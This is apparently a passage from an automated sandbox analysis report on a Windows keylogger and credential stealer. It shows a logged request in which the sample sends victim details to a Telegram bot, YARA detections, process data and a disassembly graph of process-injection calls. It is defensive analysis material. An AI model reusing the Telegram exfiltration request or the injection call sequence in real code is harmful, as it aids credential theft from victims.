                                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                9192.168.2.449764149.154.167.2204437692C:\Users\user\Desktop\file.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-31 08:15:36 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2031/12/2024%20/%2020:54:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                Host: api.telegram.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-31 08:15:36 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Tue, 31 Dec 2024 08:15:36 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 55
                                                                                                                                                Connection: close
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                2024-12-31 08:15:36 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:03:14:57
                                                                                                                                                Start date:31/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                Imagebase:0x450000
                                                                                                                                                File size:759'808 bytes
                                                                                                                                                MD5 hash:3B2A532F5145A1E1A1D04DAF8119CAF1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:03:14:59
                                                                                                                                                Start date:31/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                Imagebase:0xce0000
                                                                                                                                                File size:759'808 bytes
                                                                                                                                                MD5 hash:3B2A532F5145A1E1A1D04DAF8119CAF1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:03:15:00
                                                                                                                                                Start date:31/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248
                                                                                                                                                Imagebase:0x940000
                                                                                                                                                File size:483'680 bytes
                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:9.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:6.2%
                                                                                                                                                  Total number of Nodes:145
                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                  execution_graph 16938 e6da60 16939 e6daa6 GetCurrentProcess 16938->16939 16941 e6daf1 16939->16941 16942 e6daf8 GetCurrentThread 16939->16942 16941->16942 16943 e6db35 GetCurrentProcess 16942->16943 16944 e6db2e 16942->16944 16945 e6db6b GetCurrentThreadId 16943->16945 16944->16943 16947 e6dbc4 16945->16947 17117 e6b6d0 17118 e6b6df 17117->17118 17120 e6b7b7 17117->17120 17121 e6b7fc 17120->17121 17122 e6b7d9 17120->17122 17121->17118 17122->17121 17123 e6ba00 GetModuleHandleW 17122->17123 17124 e6ba2d 17123->17124 17124->17118 16948 6d526b8 16949 6d52843 16948->16949 16950 6d526de 16948->16950 16950->16949 16953 6d52930 PostMessageW 16950->16953 16955 6d52938 PostMessageW 16950->16955 16954 6d529a4 16953->16954 16954->16950 16956 6d529a4 16955->16956 16956->16950 16957 6d50cfb 16958 6d50c11 16957->16958 16963 6d515a6 16958->16963 16978 6d51538 16958->16978 16992 6d51548 16958->16992 16959 6d50c21 16964 6d515a9 16963->16964 16965 6d51534 16963->16965 16966 6d51586 16965->16966 17006 6d51860 16965->17006 17012 6d523a6 16965->17012 17016 6d51be7 16965->17016 17020 6d51e84 16965->17020 17025 6d51c3b 16965->17025 17030 6d51938 16965->17030 17036 6d51f18 16965->17036 17041 6d51d1c 16965->17041 17046 6d51951 16965->17046 17052 6d51851 16965->17052 17058 6d51ba3 16965->17058 16966->16959 16979 6d51548 16978->16979 16980 6d51851 2 API calls 16979->16980 16981 6d51951 2 API calls 16979->16981 16982 6d51d1c 2 API calls 16979->16982 16983 6d51586 16979->16983 16984 6d51f18 2 API calls 16979->16984 16985 6d51938 2 API calls 16979->16985 16986 6d51c3b 2 API calls 16979->16986 16987 6d51e84 2 API calls 16979->16987 16988 6d51be7 2 API calls 16979->16988 16989 6d523a6 2 API calls 16979->16989 16990 6d51860 2 API calls 16979->16990 16991 6d51ba3 2 API calls 16979->16991 16980->16983 16981->16983 16982->16983 16983->16959 16984->16983 16985->16983 16986->16983 16987->16983 16988->16983 16989->16983 16990->16983 16991->16983 16993 6d51562 16992->16993 16994 6d51851 2 API calls 16993->16994 16995 6d51951 2 API calls 16993->16995 16996 6d51d1c 2 API calls 16993->16996 16997 6d51f18 2 API calls 16993->16997 16998 6d51938 2 API calls 16993->16998 16999 6d51c3b 2 API calls 16993->16999 17000 6d51586 16993->17000 17001 6d51e84 2 API calls 16993->17001 17002 6d51be7 2 API calls 16993->17002 17003 6d523a6 2 API calls 16993->17003 17004 6d51860 2 API calls 16993->17004 17005 6d51ba3 2 API calls 16993->17005 16994->17000 16995->17000 16996->17000 16997->17000 16998->17000 16999->17000 17000->16959 17001->17000 17002->17000 17003->17000 17004->17000 17005->17000 17008 6d51893 17006->17008 17007 6d51973 17007->16966 17008->17007 17063 6d507c0 17008->17063 17067 6d507b8 17008->17067 17071 6d50530 17012->17071 17075 6d50538 17012->17075 17013 6d523ca 17013->16966 17079 6d50620 17016->17079 17083 6d50628 17016->17083 17017 6d51c09 17017->16966 17021 6d51e9c 17020->17021 17087 6d50478 17021->17087 17091 6d50470 17021->17091 17022 6d52436 17026 6d51c48 17025->17026 17028 6d50530 WriteProcessMemory 17026->17028 17029 6d50538 WriteProcessMemory 17026->17029 17027 6d51f67 17028->17027 17029->17027 17032 6d51944 17030->17032 17031 6d51973 17031->16966 17032->17031 17034 6d507c0 CreateProcessA 17032->17034 17035 6d507b8 CreateProcessA 17032->17035 17033 6d51a91 17034->17033 17035->17033 17037 6d51f1d 17036->17037 17039 6d50530 WriteProcessMemory 17037->17039 17040 6d50538 WriteProcessMemory 17037->17040 17038 6d51f67 17039->17038 17040->17038 17042 6d51d3f 17041->17042 17044 6d50530 WriteProcessMemory 17042->17044 17045 6d50538 WriteProcessMemory 17042->17045 17043 6d51df4 17044->17043 17045->17043 17049 6d51944 17046->17049 17047 6d51973 17047->16966 17048 6d51a91 17049->17047 17050 6d507c0 CreateProcessA 17049->17050 17051 6d507b8 CreateProcessA 17049->17051 17050->17048 17051->17048 17054 6d51860 17052->17054 17053 6d51973 17053->16966 17054->17053 17056 6d507c0 CreateProcessA 17054->17056 17057 6d507b8 CreateProcessA 17054->17057 17055 6d51a91 17056->17055 17057->17055 17059 6d51bb0 17058->17059 17061 6d50470 VirtualAllocEx 17059->17061 17062 6d50478 VirtualAllocEx 17059->17062 17060 6d52436 17061->17060 17062->17060 17064 6d50849 CreateProcessA 17063->17064 17066 6d50a0b 17064->17066 17068 6d507c0 CreateProcessA 17067->17068 17070 6d50a0b 17068->17070 17072 6d50538 WriteProcessMemory 17071->17072 17074 6d505d7 17072->17074 17074->17013 17076 6d50580 WriteProcessMemory 17075->17076 17078 6d505d7 17076->17078 17078->17013 17080 6d50628 ReadProcessMemory 17079->17080 17082 6d506b7 17080->17082 17082->17017 17084 6d50673 ReadProcessMemory 17083->17084 17086 6d506b7 17084->17086 17086->17017 17088 6d504b8 VirtualAllocEx 17087->17088 17090 6d504f5 17088->17090 17090->17022 17092 6d50478 VirtualAllocEx 17091->17092 17094 6d504f5 17092->17094 17094->17022 17095 e6dca8 DuplicateHandle 17096 e6dd3e 17095->17096 17097 e64668 17098 e64672 17097->17098 17100 e64759 17097->17100 17101 e6477d 17100->17101 17105 e64859 17101->17105 17109 e64868 17101->17109 17106 e6488f 17105->17106 17107 e6496c 17106->17107 17113 e644c4 17106->17113 17111 e6488f 17109->17111 17110 e6496c 17110->17110 17111->17110 17112 e644c4 CreateActCtxA 17111->17112 17112->17110 17114 e658f8 CreateActCtxA 17113->17114 17116 e659bb 17114->17116

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 06D51860 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1c508c787b286c25617195573fc03ffbba70969f96243692c85b5a2095c7e802
                                                                                                                                                  • Instruction ID: 88a5e6bb3efa1bd4ea26b2e3ab523f9d4739b8988a7dc7ad04c9e0df660b9ae0
                                                                                                                                                  • Opcode Fuzzy Hash: 1c508c787b286c25617195573fc03ffbba70969f96243692c85b5a2095c7e802
                                                                                                                                                  • Instruction Fuzzy Hash: 16711771D052298FEB64CF66CC40BE9FBB6BF89300F11D1AAD459A7650EB705A85CF80
                                                                                                                                                  Function 00E6DA60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 294 e6da60-e6daef GetCurrentProcess 298 e6daf1-e6daf7 294->298 299 e6daf8-e6db2c GetCurrentThread 294->299 298->299 300 e6db35-e6db69 GetCurrentProcess 299->300 301 e6db2e-e6db34 299->301 303 e6db72-e6db8a 300->303 304 e6db6b-e6db71 300->304 301->300 307 e6db93-e6dbc2 GetCurrentThreadId 303->307 304->303 308 e6dbc4-e6dbca 307->308 309 e6dbcb-e6dc2d 307->309 308->309
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6DADE
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00E6DB1B
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6DB58
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E6DBB1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 2063062207-3816178591
                                                                                                                                                  • Opcode ID: 4c3ed366403a31c1e299b63a0f9d4cf13cfc93667b618eba03dc1b8c09743566
                                                                                                                                                  • Instruction ID: d802304b822bb56c28c5aa70046fbfa4c6293814f42d91485c7afea94837b448
                                                                                                                                                  • Opcode Fuzzy Hash: 4c3ed366403a31c1e299b63a0f9d4cf13cfc93667b618eba03dc1b8c09743566
                                                                                                                                                  • Instruction Fuzzy Hash: 665136B0E042498FDB14DFA9D548BAEBBF1EF88314F208459D059B7360D7749984CF65
                                                                                                                                                  Function 06D507B8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 315 6d507b8-6d50855 318 6d50857-6d50861 315->318 319 6d5088e-6d508ae 315->319 318->319 320 6d50863-6d50865 318->320 326 6d508e7-6d50916 319->326 327 6d508b0-6d508ba 319->327 321 6d50867-6d50871 320->321 322 6d50888-6d5088b 320->322 324 6d50875-6d50884 321->324 325 6d50873 321->325 322->319 324->324 328 6d50886 324->328 325->324 333 6d5094f-6d50a09 CreateProcessA 326->333 334 6d50918-6d50922 326->334 327->326 329 6d508bc-6d508be 327->329 328->322 331 6d508e1-6d508e4 329->331 332 6d508c0-6d508ca 329->332 331->326 335 6d508cc 332->335 336 6d508ce-6d508dd 332->336 347 6d50a12-6d50a98 333->347 348 6d50a0b-6d50a11 333->348 334->333 337 6d50924-6d50926 334->337 335->336 336->336 338 6d508df 336->338 339 6d50949-6d5094c 337->339 340 6d50928-6d50932 337->340 338->331 339->333 342 6d50934 340->342 343 6d50936-6d50945 340->343 342->343 343->343 344 6d50947 343->344 344->339 358 6d50aa8-6d50aac 347->358 359 6d50a9a-6d50a9e 347->359 348->347 361 6d50abc-6d50ac0 358->361 362 6d50aae-6d50ab2 358->362 359->358 360 6d50aa0 359->360 360->358 364 6d50ad0-6d50ad4 361->364 365 6d50ac2-6d50ac6 361->365 362->361 363 6d50ab4 362->363 363->361 367 6d50ae6-6d50aed 364->367 368 6d50ad6-6d50adc 364->368 365->364 366 6d50ac8 365->366 366->364 369 6d50b04 367->369 370 6d50aef-6d50afe 367->370 368->367 372 6d50b05 369->372 370->369 372->372
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D509F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID: [Cx%$[Cx%
                                                                                                                                                  • API String ID: 963392458-3481866629
                                                                                                                                                  • Opcode ID: 0234431e4fbdc0dd2b1b7246a6a774432577703b82b99d58f56d6cd5a2072f75
                                                                                                                                                  • Instruction ID: 06cde0d6b831bb29fb1d862032474d4ed1c8581565ebab84c56d87610dbd5344
                                                                                                                                                  • Opcode Fuzzy Hash: 0234431e4fbdc0dd2b1b7246a6a774432577703b82b99d58f56d6cd5a2072f75
                                                                                                                                                  • Instruction Fuzzy Hash: 11919D71D00219DFEF54DFA8C841BEEBBB2BF48310F0585A9E808A7644DB749985CF92
                                                                                                                                                  Function 06D507C0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 373 6d507c0-6d50855 375 6d50857-6d50861 373->375 376 6d5088e-6d508ae 373->376 375->376 377 6d50863-6d50865 375->377 383 6d508e7-6d50916 376->383 384 6d508b0-6d508ba 376->384 378 6d50867-6d50871 377->378 379 6d50888-6d5088b 377->379 381 6d50875-6d50884 378->381 382 6d50873 378->382 379->376 381->381 385 6d50886 381->385 382->381 390 6d5094f-6d50a09 CreateProcessA 383->390 391 6d50918-6d50922 383->391 384->383 386 6d508bc-6d508be 384->386 385->379 388 6d508e1-6d508e4 386->388 389 6d508c0-6d508ca 386->389 388->383 392 6d508cc 389->392 393 6d508ce-6d508dd 389->393 404 6d50a12-6d50a98 390->404 405 6d50a0b-6d50a11 390->405 391->390 394 6d50924-6d50926 391->394 392->393 393->393 395 6d508df 393->395 396 6d50949-6d5094c 394->396 397 6d50928-6d50932 394->397 395->388 396->390 399 6d50934 397->399 400 6d50936-6d50945 397->400 399->400 400->400 401 6d50947 400->401 401->396 415 6d50aa8-6d50aac 404->415 416 6d50a9a-6d50a9e 404->416 405->404 418 6d50abc-6d50ac0 415->418 419 6d50aae-6d50ab2 415->419 416->415 417 6d50aa0 416->417 417->415 421 6d50ad0-6d50ad4 418->421 422 6d50ac2-6d50ac6 418->422 419->418 420 6d50ab4 419->420 420->418 424 6d50ae6-6d50aed 421->424 425 6d50ad6-6d50adc 421->425 422->421 423 6d50ac8 422->423 423->421 426 6d50b04 424->426 427 6d50aef-6d50afe 424->427 425->424 429 6d50b05 426->429 427->426 429->429
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D509F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID: [Cx%$[Cx%
                                                                                                                                                  • API String ID: 963392458-3481866629
                                                                                                                                                  • Opcode ID: 84209b81ee95c8e3575c03e4f71acff29e374ba28a9622caebd235653ab61daf
                                                                                                                                                  • Instruction ID: 4063613f196fc3f6e604ec69d2647d6896191ef0918d6202660517fb6ed5eae3
                                                                                                                                                  • Opcode Fuzzy Hash: 84209b81ee95c8e3575c03e4f71acff29e374ba28a9622caebd235653ab61daf
                                                                                                                                                  • Instruction Fuzzy Hash: 01919D71D00219DFEF54DFA8C841BEEBBB2BF48310F1585A9E808A7644DB749985CF92
                                                                                                                                                  Function 00E6B7B7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 204COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 452 e6b7b7-e6b7d7 453 e6b803-e6b807 452->453 454 e6b7d9-e6b7e6 call e6b458 452->454 456 e6b81b-e6b85c 453->456 457 e6b809-e6b813 453->457 460 e6b7fc 454->460 461 e6b7e8 454->461 463 e6b85e-e6b866 456->463 464 e6b869-e6b877 456->464 457->456 460->453 509 e6b7ee call e6ba53 461->509 510 e6b7ee call e6ba60 461->510 463->464 465 e6b89b-e6b89d 464->465 466 e6b879-e6b87e 464->466 471 e6b8a0-e6b8a7 465->471 468 e6b880-e6b887 call e6b464 466->468 469 e6b889 466->469 467 e6b7f4-e6b7f6 467->460 470 e6b938-e6b9f8 467->470 473 e6b88b-e6b899 468->473 469->473 502 e6ba00-e6ba2b GetModuleHandleW 470->502 503 e6b9fa-e6b9fd 470->503 474 e6b8b4-e6b8bb 471->474 475 e6b8a9-e6b8b1 471->475 473->471 476 e6b8bd-e6b8c5 474->476 477 e6b8c8-e6b8d1 call e6b474 474->477 475->474 476->477 483 e6b8d3-e6b8db 477->483 484 e6b8de-e6b8e3 477->484 483->484 485 e6b8e5-e6b8ec 484->485 486 e6b901-e6b905 484->486 485->486 488 e6b8ee-e6b8fe call e6b484 call e6b494 485->488 507 e6b908 call e6bd60 486->507 508 e6b908 call e6bd31 486->508 488->486 491 e6b90b-e6b90e 493 e6b910-e6b92e 491->493 494 e6b931-e6b937 491->494 493->494 504 e6ba34-e6ba48 502->504 505 e6ba2d-e6ba33 502->505 503->502 505->504 507->491 508->491 509->467 510->467
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E6BA1E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 4139908857-3816178591
                                                                                                                                                  • Opcode ID: 8de9a9b6684ed202f2b01c30b4bc22b9f8b88e8804036b3c62dc787f2dd2cb2c
                                                                                                                                                  • Instruction ID: 4f4c2ae69cb2f2d31acd192f0fafcdf0b0eb2982abbbb3f10a5ea7151ec8e1e6
                                                                                                                                                  • Opcode Fuzzy Hash: 8de9a9b6684ed202f2b01c30b4bc22b9f8b88e8804036b3c62dc787f2dd2cb2c
                                                                                                                                                  • Instruction Fuzzy Hash: D4815770A00B458FDB24DF29E15175ABBF5BF88344F008A2ED086E7B51DB74E885CB90
                                                                                                                                                  Function 00E658EC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 511 e658ec-e659b9 CreateActCtxA 513 e659c2-e65a1c 511->513 514 e659bb-e659c1 511->514 521 e65a1e-e65a21 513->521 522 e65a2b-e65a2f 513->522 514->513 521->522 523 e65a40 522->523 524 e65a31-e65a3d 522->524 526 e65a41 523->526 524->523 526->526
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E659A9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 2289755597-3816178591
                                                                                                                                                  • Opcode ID: 82ad24a1e3471ff742f4562e33fa0c84a6723eda88ea17cda50a30d84dc7bb94
                                                                                                                                                  • Instruction ID: dc1f33c6965b41d4533439ebc687fe66dfd60dd44f8b0f0d62d11db91fa232c4
                                                                                                                                                  • Opcode Fuzzy Hash: 82ad24a1e3471ff742f4562e33fa0c84a6723eda88ea17cda50a30d84dc7bb94
                                                                                                                                                  • Instruction Fuzzy Hash: C641E2B1D00619CBDB24CFA9C8846CDBBB6BF88304F24816AD408AB255DB755986CF90
                                                                                                                                                  Function 00E644C4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 527 e644c4-e659b9 CreateActCtxA 530 e659c2-e65a1c 527->530 531 e659bb-e659c1 527->531 538 e65a1e-e65a21 530->538 539 e65a2b-e65a2f 530->539 531->530 538->539 540 e65a40 539->540 541 e65a31-e65a3d 539->541 543 e65a41 540->543 541->540 543->543
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E659A9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 2289755597-3816178591
                                                                                                                                                  • Opcode ID: 9fe97ed2c538dcf5faea504734219f7305615dbd24c7f1e10fd96d263b477c1f
                                                                                                                                                  • Instruction ID: 7b1a344798d3819f8569eabe4a5c5033e52aa9734f25dd0610faf386fc8fdbb6
                                                                                                                                                  • Opcode Fuzzy Hash: 9fe97ed2c538dcf5faea504734219f7305615dbd24c7f1e10fd96d263b477c1f
                                                                                                                                                  • Instruction Fuzzy Hash: 4441FFB1D0071DCBDB24CFA9C884B9EBBB6BF88304F24816AD409BB251DB756945CF91
                                                                                                                                                  Function 06D50530 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72injectionCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 544 6d50530-6d50586 547 6d50596-6d505d5 WriteProcessMemory 544->547 548 6d50588-6d50594 544->548 550 6d505d7-6d505dd 547->550 551 6d505de-6d5060e 547->551 548->547 550->551
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D505C8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 3559483778-3816178591
                                                                                                                                                  • Opcode ID: a30d66b6b20422634072005759b43477c873a77e73b0f203c920887709cb94f5
                                                                                                                                                  • Instruction ID: ca97cc8aac413f7f8bf20a1bf972bd48ecbe85da8595495bce8711b105659bc4
                                                                                                                                                  • Opcode Fuzzy Hash: a30d66b6b20422634072005759b43477c873a77e73b0f203c920887709cb94f5
                                                                                                                                                  • Instruction Fuzzy Hash: 102157B19003599FCF10CFA9C885BEEBBF5FF48310F10842AE959A7240C778A944CBA4
                                                                                                                                                  Function 06D50538 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
